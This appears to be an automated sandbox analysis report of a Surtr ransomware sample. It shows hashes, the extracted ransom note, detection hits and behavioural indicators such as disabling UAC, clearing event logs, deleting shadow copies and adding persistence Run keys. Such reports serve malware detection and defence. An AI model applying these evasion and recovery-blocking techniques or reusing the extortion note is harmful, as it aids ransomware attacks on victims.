surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-01-2025 00:01

250101-aay9eawncs 10

31-12-2024 23:46

241231-3sc34swjct 10

Analysis

max time kernel
839s
max time network
840s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-01-2025 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
SSDEEP

6144:Q4K8rYBWqjbqL7busNWGl3GDmm+miR9zrmkdAZ:Q46QKbQJNDl3cmgiRlK

Score

10^/10

surtr credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (WJVoydoUbR7cjA) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 53 IoCs

resource	yara_rule
behavioral1/memory/2504-9-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-12-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-21-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-37-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-35-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-33-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-31-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-18-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-26-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-36-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-34-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-32-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-30-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-28-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-24-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-22-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-20-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-16-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-29-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-27-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-25-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-23-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-19-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-17-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-15-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-10-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-39-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-43-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-42-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-41-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-40-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-54-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-53-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-52-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-51-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-50-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-49-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-48-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-47-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-46-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-45-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-44-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-55-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-57-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-59-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-61-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-62-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-56-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-63-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-60-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-58-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-114-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/2504-1470-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
Surtr family
surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
3900	wevtutil.exe
5224	wevtutil.exe
376	wevtutil.exe
4164	Process not Found
6948	Process not Found
4424	wevtutil.exe
6520	wevtutil.exe
4412	wevtutil.exe
3208	Process not Found
6192	Process not Found
3396	wevtutil.exe
2688	Process not Found
4604	wevtutil.exe
5824	Process not Found
1076	wevtutil.exe
4276	Process not Found
816	Process not Found
3176	Process not Found
5736	Process not Found
5716	wevtutil.exe
6224	Process not Found
376	wevtutil.exe
5420	wevtutil.exe
5356	wevtutil.exe
5896	wevtutil.exe
4832	wevtutil.exe
6332	wevtutil.exe
5048	wevtutil.exe
6232	Process not Found
3892	Process not Found
3376	wevtutil.exe
5352	wevtutil.exe
5952	wevtutil.exe
1112	Process not Found
3464	Process not Found
5484	wevtutil.exe
5220	Process not Found
5240	Process not Found
4316	wevtutil.exe
3920	wevtutil.exe
3568	wevtutil.exe
6268	wevtutil.exe
3428	Process not Found
1548	Process not Found
4140	Process not Found
4752	Process not Found
2148	wevtutil.exe
6724	wevtutil.exe
3968	Process not Found
1748	Process not Found
1688	Process not Found
2764	Process not Found
5908	Process not Found
4368	Process not Found
7024	wevtutil.exe
6512	wevtutil.exe
1652	wevtutil.exe
5872	Process not Found
6540	wevtutil.exe
2276	Process not Found
2520	Process not Found
2964	Process not Found
5536	Process not Found
4240	Process not Found

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3716	bcdedit.exe
3828	bcdedit.exe

Renames multiple (9427) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 7 IoCs

flow	pid	Process
75	760	Process not Found
76	760	Process not Found
79	760	Process not Found
80	760	Process not Found
81	760	Process not Found
83	760	Process not Found
85	760	Process not Found

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\W:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Z:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\G:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\K:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\R:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\B:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\H:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\I:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\V:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\L:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\M:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Q:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\T:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\E:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\J:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\P:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\X:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\U:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\S:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\N:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Y:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\A:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3180	Process not Found

Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
964	Process not Found
6536	Process not Found
6560	Process not Found
6616	Process not Found
612	Process not Found
1516	Process not Found

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1924 set thread context of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2504-5-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-8-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-9-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-7-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-6-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-3-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-1-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-12-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-21-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-37-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-35-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-33-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-31-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-18-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-26-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-36-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-34-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-32-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-30-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-28-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-24-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-22-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-20-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-16-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-29-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-27-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-25-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-23-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-19-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-17-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-15-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-10-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-39-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-43-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-42-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-41-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-40-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-54-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-53-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-52-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-51-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-50-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-49-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-48-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-47-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-46-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-45-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-44-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-55-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-57-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-59-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-61-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-62-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-56-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-63-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-60-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-58-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-114-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/2504-1470-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH.HXS.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\msvcr100.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\highDpiImageSwap.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\micaut.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\ALRTINTL.DLL.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Common Files\System\ado\it-IT\msader15.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14980_.GIF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\README.HTM.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GB.XSL.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\gadget.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\ShvlRes.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Net.Resources.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libmod_plugin.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\System.IO.Log.Resources.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre7\bin\management.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN090.XML.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
